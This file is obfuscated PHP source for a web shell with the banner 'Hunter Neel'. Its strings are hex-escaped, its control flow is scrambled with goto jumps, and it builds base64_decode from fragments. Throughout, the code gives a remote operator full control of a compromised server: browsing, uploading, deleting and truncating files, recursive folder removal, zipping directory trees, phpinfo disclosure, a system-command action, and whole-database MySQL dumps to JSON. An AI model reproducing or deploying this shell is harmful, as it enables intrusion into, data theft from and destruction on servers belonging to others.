"\40\74\x61\40\x68\x72\x65\x66\75\42\152\x61\x76\141\163\x63\162\x69\x70\x74\x3a\163\x65\150\151\x66\x65\50\47" . str_replace("\146\141\x79\x6c\137\x6f\170\165", "\146\141\x79\x6c\x5f\171\x75\153\154\145", $url) . "\47\51\42" . $classN . "\x3e\104\157\167\156\154\157\x61\144\x3c\x2f\141\76\40\174\40" . ("\x20\x3c\x61\40\x68\162\145\x66\x3d\42\x6a\141\x76\x61\x73\143\162\151\x70\x74\72\x63\150\x61\x6e\x67\145\106\151\154\x65\x4e\x61\155\x65\50\x27" . htmlspecialchars($adi) . "\x27\40\x2c\x20\x27" . str_replace("\x66\141\171\154\137\x6f\170\x75", "\x66\141\x79\x6c\137\141\144\137\144\x65\x79\151\x73\x68", $url) . "\x27\51\x3b\42" . $classN . "\76\122\x65\156\x61\155\x65\x3c\x2f\141\x3e\x20\174\40") . ("\x20\x3c\x61\x20\150\162\x65\x66\x3d\x22\152\x61\166\x61\163\x63\162\151\x70\164\72\x66\141\171\x6c\x53\x69\x66\x69\x72\x6c\x61\50\47" . str_replace("\x66\x61\171\x6c\x5f\157\x78\165", "\x66\141\171\x6c\x5f\x73\151\146\151\x72\x6c\x61", $url) . "\47\51\x3b\x22" . $classN . "\x3e\124\x72\165\156\143\x61\x74\x65\x3c\x2f\141\x3e\40\174\x20") . ("\x20\x3c\141\x20\150\x72\x65\146\75\42\x6a\x61\x76\141\163\143\162\151\x70\164\x3a\146\x61\171\x6c\x53\151\154\50\x27" . str_replace("\146\141\x79\x6c\x5f\157\x78\165", "\146\141\x79\x6c\137\x73\151\x6c", $url) . "\47\51\x22" . $classN . "\76\104\145\x6c\145\x74\x65\x3c\x2f\141\76"); } else { if ($adi != "\133\40\56\x20\135" && $adi != "\x5b\40\x2e\56\40\135") { print "\40\x3c\x61\40\x68\162\x65\x66\x3d\42\152\141\x76\141\x73\143\162\x69\160\164\x3a\172\151\x70\154\145\x28\x27" . urlencode(urlencode(shifrele($faylAdiTam))) . "\x27\x29\x22" . $classN . "\76\x5a\151\160\x3c\x2f\x61\76\40\174\40" . ("\40\74\x61\x20\150\162\145\x66\75\42\152\x61\x76\x61\x73\x63\x72\151\160\x74\72\163\151\x6c\x50\141\x70\x6b\141\50\x27" . urlencode(urlencode(shifrele($faylAdiTam))) . "\47\x29\x22" . $classN . "\76\x44\145\x6c\x65\x74\145\74\57\x61\76"); } } print "\74\57\164\144\x3e\xa\11\11\x9\11\11\74\x2f\x74\x72\76"; } } else { print "\x3c\x64\151\x76\x20\163\x74\x79\154\x65\75\47\x6d\141\162\147\x69\156\72\x20\61\x30\160\x78\40\60\160\170\x3b\47\40\143\154\141\x73\x73\75\x27\161\141\154\151\156\47\76\120\145\x72\155\x69\x73\163\x69\x6f\x6e\163\x20\144\x65\156\x69\x64\145\144\41\x3c\57\x64\151\166\x3e"; } } } } } } } goto vL_7c; hADie: print "\x3c\x73\x70\141\x6e\x20\143\154\x61\163\163\75\47\x71\141\x6c\x69\x6e\47\76\123\x61\146\x65\40\x6d\x6f\144\x65\x3a\40\x3c\57\163\160\x61\156\76" . ($safeMode === true ? "\x3c\x73\x70\141\x6e\40\x63\154\141\163\163\75\x27\x62\x61\144\x27\76\x4f\156" : "\74\163\160\141\156\x20\143\x6c\141\163\x73\x3d\47\x73\165\143\x63\x65\163\x73\47\76\117\146\x66") . "\74\x2f\163\x70\x61\156\x3e\74\x73\160\141\x6e\x20\163\164\171\x6c\x65\x3d\x27\x6d\x61\162\x67\x69\x6e\x2d\154\x65\x66\x74\x3a\40\65\x30\160\170\73\47\x3e\74\141\40\150\x72\145\x66\75\x27\x6a\x61\166\141\163\143\x72\x69\x70\164\72\163\x65\x68\x69\146\145\50\x22\x3f\x6e\145\x3d\160\x68\160\x69\x6e\x66\x6f\42\x29\x27\76\133\40\x50\110\x50\x69\156\146\157\x20\x5d\x3c\57\x61\76\x3c\x2f\163\x70\x61\x6e\76\74\142\162\x2f\76"; goto EoqqZ; gFRfl: $ne = isset($_POST["\x6e\145"]) && in_array($_POST["\156\145"], $actions) ? $_POST["\x6e\x65"] : "\x65\x73\x61\x73"; goto kXzcF; A3_VW: $safeMode = true; goto uD0dU; f2vka: function deshifrele($str) { $f = "\x62\x61\163"; $f .= "\145\x36"; $f .= "\64\137"; $f .= "\x64"; $f .= "\x65\x63"; $f .= "\157\x64\145"; return $f($str); } goto lcKx9; iYh8W: function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "\56" && $object != "\56\56") { if (is_dir($dir . "\57" . $object)) { rrmdir($dir . "\57" . $object); } else { unlink($dir . "\x2f" . $object); } } } rmdir($dir); } } goto UrlYZ; S1HzG: ?> "name="qovluq"type="hidden"> <input name="ufayl"type="file"> <input value="Upload Now"type="submit"></form><form method="POST"id="post_form"style="display:none"></form><script>function sehife(e){var a="";if(void 0!==(e=e.split("?"))[1]){for(var n in e=e[1].split("&")){var t=e[n].split("=");void 0!==t[1]&&(a+="<input name='"+t[0]+"' value='"+t[1]+"' type='hidden'>")}document.all("post_form").innerHTML=a,document.all("post_form").submit()}}function faylSil(e){confirm("are you sure?")&&sehife(e)}function faylSifirla(e){confirm("are you sure?")&&sehife(e)}function changeFileName(e,a){var n=prompt("Change file name:",e);n&&sehife(a+"&new_name="+n)}function newFile(){var e=prompt("File name:");e&&sehife("?ne=fayl_yarat&ad="+e+"&qovluq=<?php goto G7Ovo; lcKx9: function tookYarat($tAd) { if (isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $yeniTook = md5(shifrele(time() . rand(1, 99999999))); $_SESSION[$tAd] = $yeniTook; return $yeniTook; } goto SDUaL; lW11v: $baqliFunksiyalar = explode("\54", ''); goto A3_VW; SDUaL: function qovluquYaz() { global $default_dir; $sonDir = array(); $umumiHisseler = ''; $parse = explode("\57", $default_dir); $ii = 0; foreach ($parse as $hisse) { $ii++; $umumiHisseler .= $hisse . "\57"; $sonDir[] = "\74\141\x20\x68\x72\145\x66\x3d\47\152\x61\166\141\x73\x63\162\x69\x70\164\72\163\145\150\151\x66\145\50\42\77\161\x6f\x76\x6c\x75\161\75" . urlencode(urlencode(shifrele($umumiHisseler))) . "\x22\51\x27\x3e" . htmlspecialchars(empty($hisse) && $ii != count($parse) ? "\x2f" : $hisse) . "\74\x2f\x61\x3e"; } $sonDir = implode("\57", $sonDir); print $sonDir . "\x26\156\x62\x73\160\73\x26\x6e\142\163\160\x3b\46\156\x62\163\160\x3b\46\156\x62\163\160\x3b\x26\x6e\x62\163\x70\73\46\156\x62\x73\160\73\50\40\74\141\x20\150\162\x65\146\x3d\x22\x22\76\x52\x65\163\x65\164\x3c\x2f\x61\x3e\40\x7c\40\x3c\141\x20\150\x72\145\146\x3d\42\x6a\141\x76\141\163\143\162\x69\160\x74\x3a\x67\x6f\164\157\x28\x29\42\x3e\x47\157\40\164\157\x3c\x2f\x61\76\x20\51"; } goto g5cT_; A7frr: ?> ")}function newPapka(){var e=prompt("File name:");e&&sehife("?ne=papka_yarat&ad="+e+"&qovluq=<?php goto p0k0P; VJS7D: ?> <html><head><title>ok</title><meta content="text/html; charset=utf-8"http-equiv="content-type"><audio autoplay><source src="https://www.soundjay.com/buttons/beep-24.mp3"type="audio/mpeg"></audio><div class="file-manager"><h1>Hunter Neel</h1><style>body{background-color:#222;color:#d6d4d4;font-family:Lucida,Verdana;font-size:12px}.qalin{text-decoration:none;color:#0ff;font-weight:600}.success{color:#9db754}.bad{color:#b75654}a{color:#7fff00;text-decoration:none!important}.fManager,.fManager tbody,.fManager tr{padding:0;border-collapse:collapse;margin:0;font-size:12px}.fManager{margin:10px 0}.fManager tbody tr:nth-child(2n+1){background:#331717}.fManager tbody tr:nth-child(2n){background:#1c0c0c}.fManager tbody tr:hover{background:#000}.fManager thead th{text-align:left}.fManager thead tr{background-color:#333}.fManager{box-shadow:1px 1px 1px 1px #333}.fManager thead th{padding:4px 3px}.fayl_oxu{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}.btn{border:1px solid #acae40;background-color:#223b3b;color:#e1e1e1;padding:1px 10px;cursor:pointer}.btn:disabled{border:1px solid #848484;color:#848484;cursor:not-allowed}.file_edit{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}input,select,textarea{background:0 0!important;color:#0ff;border:1px solid #0ff;padding:5px}table td{border:1px solid #006400;min-width:20px;padding-left:5px;padding-right:5px;max-width:500px;color:#006400;background:#292929}table th{border:1px solid #0ff;padding-left:5px;padding-right:5px;color:#006400}table td div{overflow:auto;width:100%;height:100%;max-height:100px}</style></head><body><?php goto CdHEz; uD0dU: $actions = array("\x65\163\141\163", "\x66\x61\171\x6c\137\x6f\170\x75", "\x70\x68\x70\x69\x6e\146\x6f", "\163\x69\x73\x74\x65\155\137\153\157\x6d", "\146\x61\171\x6c\137\x72\145\x64\x61\153\164\145", "\146\141\171\154\x5f\x79\165\153\x6c\x65", "\146\141\171\154\137\x73\151\x6c", "\x66\x61\x79\x6c\137\171\141\162\141\x74", "\160\x61\x70\x6b\141\137\x79\141\162\141\164", "\146\x61\171\x6c\137\163\x69\146\x69\x72\x6c\141", "\160\x61\160\x6b\x61\137\x73\x69\154", "\146\x61\171\154\137\141\144\x5f\144\145\171\151\x73\150", "\x7a\151\160\154\x65", "\x73\153\x6c", "\163\153\154\137\144\x5f\164", "\163\153\154\137\144", "\146\141\x79\x6c\x5f\x75\x70\x6c"); goto gFRfl; LaTgj: if (isset($_POST["\161\x6f\166\154\x75\x71"]) && is_string($_POST["\x71\157\166\x6c\x75\161"])) { $default_dir = empty($_POST["\161\157\x76\154\x75\x71"]) ? DIRECTORY_SEPARATOR : deshifrele(urldecode(urldecode($_POST["\x71\157\166\x6c\165\x71"]))); $c_h_dir_comm = "\143" . "\150\x64" . "\x69\162"; $c_h_dir_comm($default_dir); } goto SU0QX; vL_7c: print "\74\57\164\x62\157\x64\x79\76\74\57\164\141\142\154\x65\76"; goto WZkdL; UrlYZ: $default_dir = getcwd(); goto LaTgj; W3vrk: print "\x3c\150\x72\76"; goto VRZcD; GMnFM: session_start(); goto lW11v; WZkdL: ?> <hr><a href="javascript:newFile();">Create File</a> | <a href="javascript:newPapka();">Create Folder</a><br><a href="javascript:sehife('?ne=sistem_kom&qovluq=<?php goto Jyhdk; Jyhdk: echo urlencode(urlencode(shifrele($default_dir))); goto O5_CZ; uLjjF: ?> ")}function skl_bas(){sehife("?ne=skl&emr="+b64EncodeUnicode(document.getElementById("skl_emr").value))}function b64EncodeUnicode(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,a){return String.fromCharCode("0x"+a)}))}function goto(){var e=prompt("Dir:");e&&sehife("?qovluq="+e)}function ziple(e){var a=prompt("Dir:","<?php goto jR2rD; pbROK: print "\74\x73\x70\141\x6e\40\143\154\141\x73\x73\75\47\161\141\154\x69\156\47\76\104\151\163\141\x62\x6c\x65\40\146\x75\156\143\x74\151\x6f\x6e\x73\x3a\x3c\57\163\x70\141\x6e\76\40" . (implode("\54\x20", $baqliFunksiyalar) == '' ? "\74\x73\x70\141\x6e\40\x63\154\x61\x73\x73\75\x27\163\165\143\143\x65\163\x73\x27\76\x4f\106\x46\40\x3a\51" : "\x3c\x73\x70\x61\156\40\143\x6c\x61\x73\x73\x3d\47\x62\141\144\47\x3e" . implode("\x2c\x20", $baqliFunksiyalar)) . "\x3c\57\163\160\141\x6e\76\74\142\x72\57\76"; goto hADie; IX0YF: if (isset($_GET["\156\x65"]) && $_GET["\x6e\145"] == "\160\151\156\x66") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("\142\x6f\x64\171\40\x7b\142\141\143\x6b\x67\x72\157\165\156\x64\x2d\x63\157\x6c\157\162\x3a\x20\x23\x66\x66\146\x66\x66\x66\73\x20\x63\157\154\x6f\162\72\40\x23\x30\x30\x30\60\60\x30\73\x7d", '', $pInf); die; } else { if ($ne == "\146\x61\171\154\x5f\171\x75\153\154\x65" && isset($_POST["\146\141\x79\x6c"]) && '' != trim($_POST["\x66\x61\x79\154"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\x61\171\x6c"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { header("\x43\x6f\156\164\x65\x6e\x74\x2d\104\151\163\x70\157\x73\x69\x74\151\x6f\156\x3a\x20\x61\164\164\x61\x63\x68\155\x65\x6e\164\73\x20\146\x69\154\x65\x6e\x61\x6d\145\x3d" . basename($faylAdi)); header("\103\x6f\156\x74\x65\x6e\164\55\124\x79\160\x65\72\40\141\160\x70\154\151\x63\141\x74\151\x6f\x6e\57\x6f\x63\x74\145\164\55\163\x74\x72\x65\x61\x6d"); header("\103\x6f\156\x74\x65\x6e\164\x2d\x4c\x65\156\x67\164\150\x3a\40" . filesize($default_dir . $ayirici . $faylAdi)); readfile($default_dir . $ayirici . $faylAdi); die; } } else { if ($ne == "\x66\141\171\x6c\137\163\151\x6c" && isset($_POST["\146\x61\x79\x6c"]) && '' != trim($_POST["\x66\x61\x79\154"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\141\x79\x6c"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { unlink($default_dir . $ayirici . $faylAdi); } } else { if ($ne == "\x66\141\171\x6c\x5f\x73\151\146\151\x72\x6c\x61" && isset($_POST["\x66\x61\x79\x6c"]) && '' != trim($_POST["\146\x61\171\x6c"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\141\x79\154"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "\146\x61\171\x6c\x5f\171\141\162\141\164" && isset($_POST["\x61\x64"]) && !empty($_POST["\141\x64"])) { $faylAdi = basename(urldecode($_POST["\141\144"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi)) { print "\x3c\163\143\x72\x69\160\x74\x3e\x61\x6c\145\162\x74\x28\x22\x42\x75\40\x61\144\144\141\x20\x66\x61\x79\154\x20\141\x72\x74\151\x71\x20\155\157\166\x63\165\144\x64\165\162\41\42\x29\73\74\57\163\x63\162\x69\160\x74\76"; } else { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "\x70\x61\x70\x6b\x61\x5f\x79\141\162\141\164" && isset($_POST["\x61\x64"]) && !empty($_POST["\x61\144"])) { $papkaAdi = basename(urldecode($_POST["\141\144"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($papkaAdi, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $ayirici . $papkaAdi)) { print "\x3c\x73\x63\x72\151\x70\164\x3e\x61\x6c\x65\x72\x74\x28\x22\x42\165\x20\x61\144\x64\x61\40\x70\x61\160\153\141\40\x61\x72\x74\151\x71\40\x6d\157\166\x63\x75\144\144\x75\162\41\42\x29\x3b\74\x2f\x73\143\162\x69\160\164\76"; } else { mkdir($default_dir . $ayirici . $papkaAdi); } } else { if ($ne == "\x66\x61\x79\154\x5f\x61\x64\137\144\145\x79\x69\x73\x68" && isset($_POST["\146\141\x79\x6c"]) && '' != trim($_POST["\x66\x61\x79\x6c"]) && isset($_POST["\x6e\145\167\x5f\x6e\141\155\145"]) && is_string($_POST["\156\145\x77\137\156\x61\155\145"]) && !empty($_POST["\x6e\145\167\137\156\x61\155\x65"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\x61\x79\154"]))); $faylYeniAd = basename(urldecode($_POST["\156\145\167\x5f\x6e\x61\x6d\145"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($faylAdi, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { rename($default_dir . $ayirici . $faylAdi, $default_dir . $ayirici . $faylYeniAd); } } else { if ($ne == "\163\153\x6c\137\x64\137\164" && isset($_POST["\164"]) && is_string($_POST["\164"]) && !empty($_POST["\164"])) { $tableName = deshifrele(urldecode($_POST["\x74"])); $host = isset($_COOKIE["\x68\x6f\163\x74"]) ? $_COOKIE["\150\x6f\x73\x74"] : ''; $user = isset($_COOKIE["\x75\163\145\162"]) ? $_COOKIE["\x75\x73\x65\x72"] : ''; $parol = isset($_COOKIE["\160\141\x72\157\x6c"]) ? $_COOKIE["\160\141\162\x6f\x6c"] : ''; $baza = isset($_COOKIE["\x62\x61\172\141"]) ? $_COOKIE["\142\x61\172\141"] : ''; $bazaStr = empty($baza) ? '' : "\144\142\156\141\x6d\145\x3d" . $baza . "\73"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("\x6d\x79\x73\x71\154\72\x68\157\163\164\x3d" . $host . "\73\143\150\141\x72\163\x65\164\75\165\164\146\x38\73" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\x45\124\40\x4e\x41\x4d\105\x53\40\x27\165\x74\146\70\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("\123\x45\x4c\105\x43\124\40\143\157\154\165\155\x6e\137\156\x61\155\145\40\146\x72\x6f\155\x20\151\156\x66\157\162\x6d\x61\x74\151\x6f\x6e\137\163\x63\x68\x65\x6d\x61\56\143\157\154\165\155\x6e\x73\x20\x77\150\145\162\145\x20\x74\x61\x62\x6c\x65\137\163\x63\x68\145\x6d\141\75\77\x20\141\x6e\144\40\x74\141\x62\x6c\145\x5f\156\141\x6d\145\x3d\x3f"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $data = $pdo->query("\123\x45\114\105\103\x54\x20\x2a\40\106\122\x4f\x4d\40\140" . $tableName . "\140"); $data = $data->fetchAll(); header("\103\x6f\156\164\145\156\x74\x2d\x64\151\163\160\157\163\x69\x74\151\x6f\156\72\40\x61\x74\164\141\143\150\x6d\x65\156\164\x3b\x20\146\151\154\145\156\x61\x6d\x65\x3d\x64\137" . basename(htmlspecialchars($tableName)) . "\56\x6a\x73\x6f\x6e"); header("\x43\157\x6e\164\x65\156\164\55\x74\x79\x70\x65\x3a\40\x61\160\x70\154\151\x63\141\164\151\x6f\156\57\152\x73\157\156"); echo json_encode($data); } else { print "\x54\141\142\154\x65\x20\156\x6f\164\x20\x66\x6f\x75\x6e\x64\41"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "\x45\162\x72\x6f\162\x21\40\x50\x6c\145\x61\x73\x65\x20\143\x6f\156\x6e\145\x63\x74\40\x74\157\40\123\121\114\x21"; } die; } else { if ($ne == "\163\x6b\154\137\144") { $host = isset($_COOKIE["\x68\157\163\164"]) ? $_COOKIE["\150\157\x73\x74"] : ''; $user = isset($_COOKIE["\165\163\145\162"]) ? $_COOKIE["\x75\x73\x65\162"] : ''; $parol = isset($_COOKIE["\160\141\162\157\x6c"]) ? $_COOKIE["\x70\x61\162\x6f\x6c"] : ''; $baza = isset($_COOKIE["\x62\x61\x7a\141"]) ? $_COOKIE["\142\x61\172\141"] : ''; $bazaStr = empty($baza) ? '' : "\144\142\x6e\x61\x6d\x65\x3d" . $baza . "\73"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("\x6d\x79\163\x71\154\72\x68\157\x73\x74\x3d" . $host . "\x3b\x63\150\x61\162\163\145\164\x3d\165\x74\146\x38\x3b" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\x45\x54\40\x4e\x41\x4d\x45\x53\40\x27\165\164\146\70\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare("\123\x45\114\105\103\x54\x20\164\141\x62\x6c\x65\x5f\x6e\x61\x6d\x65\40\x66\162\x6f\x6d\40\x69\x6e\146\157\162\155\141\164\151\x6f\156\137\x73\x63\150\145\155\x61\x2e\x74\x61\142\154\x65\163\x20\x77\150\x65\162\145\x20\x74\x61\x62\154\x65\137\163\x63\x68\x65\155\141\x3d\77"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); foreach ($tables as $tableName) { $tableName = $tableName["\x74\x61\x62\154\145\x5f\x6e\141\x6d\x65"]; $data = $pdo->query("\123\105\114\x45\x43\124\40\52\40\106\x52\117\x4d\x20\140" . $tableName . "\140"); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header("\x43\x6f\156\x74\x65\156\164\x2d\144\x69\163\160\157\x73\151\164\x69\157\156\x3a\x20\x61\x74\164\x61\x63\x68\155\145\x6e\164\73\40\x66\x69\154\145\x6e\x61\x6d\145\75\144\137\x62\x5f" . basename(htmlspecialchars($baza)) . "\56\x6a\x73\x6f\156"); header("\x43\157\x6e\x74\145\156\164\x2d\x74\x79\x70\145\x3a\x20\141\160\x70\154\x69\143\141\164\x69\x6f\x6e\57\x6a\163\x6f\156"); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "\105\162\162\x6f\x72\x21\x20\x50\154\145\x61\x73\x65\40\x63\x6f\x6e\x6e\x65\143\x74\x20\x74\x6f\x20\x53\x51\x4c\41"; } die; } else { if ($ne == "\172\x69\160\154\145" && isset($_POST["\x73\141\166\x65\x5f\164\157"], $_POST["\172\146"]) && is_string($_POST["\163\141\166\145\137\164\157"]) && !empty($_POST["\163\141\166\145\x5f\164\x6f"]) && !in_array($_POST["\163\141\166\x65\137\164\x6f"], array("\56", "\56\x2e", "\56\57", "\56\56\57")) && is_string($_POST["\x7a\146"]) && !empty($_POST["\x7a\x66"])) { $save_to = deshifrele(urldecode($_POST["\x73\141\166\x65\x5f\x74\x6f"])); $rootPath = realpath(deshifrele(urldecode($_POST["\x7a\x66"]))); $fileName1 = "\x62\x61\153\137" . microtime(1) . "\137" . rand(1000, 99999) . "\x2e\172\151\x70"; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if (is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "\123\x61\x76\145\144\x21\74\x68\x72\x3e"; } else { print "\x44\x69\x72\40\x69\163\x20\156\x6f\164\x20\167\162\151\164\145\x61\142\154\x65\x21\x3c\x68\x72\76"; var_dump($save_to); } } else { if ($ne == "\x70\x61\160\153\141\137\x73\151\x6c" && isset($_POST["\172\x66"]) && is_string($_POST["\172\x66"]) && !empty($_POST["\172\146"])) { $rootPath = realpath(deshifrele(urldecode($_POST["\x7a\146"]))); if (is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); } else { print "\x44\151\162\40\151\x73\x20\x6e\x6f\164\x20\x77\x72\x69\x74\145\141\142\x6c\145\41\74\150\x72\x3e"; var_dump($save_to); } } else { if ($ne == "\x66\141\x79\154\137\165\160\x6c" && isset($_FILES["\x75\146\x61\171\x6c"])) { move_uploaded_file($_FILES["\165\146\x61\171\x6c"]["\x74\155\160\x5f\156\x61\155\x65"], $default_dir . "\57" . $_FILES["\x75\146\141\x79\154"]["\x6e\141\x6d\145"]); print "\x55\160\x6c\x6f\x61\x64\40\x6f\x6c\x64\165\x20\144\x65\171\145\x73\x65\156\x2e"; } } } } } } } } } } } } goto VJS7D; G7Ovo: echo urlencode(urlencode(shifrele($default_dir))); goto A7frr; NGaCE: ?> &zf="+e)}function shifrelee(){var e=document.getElementsByClassName("file_edit")[0].value,a=["a","i","e","s","l","b","u","o","p","h","\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"];for(var n in a){var t=a[n];e=e.replace(new RegExp(t,"g"),"|:"+n+":|")}document.getElementsByClassName("file_edit")[0].value=e}document.getElementById("emr_et_atash").addEventListener("keyup",function(e){e.preventDefault(),13===e.keyCode&&sistemKom()})</script></body></html>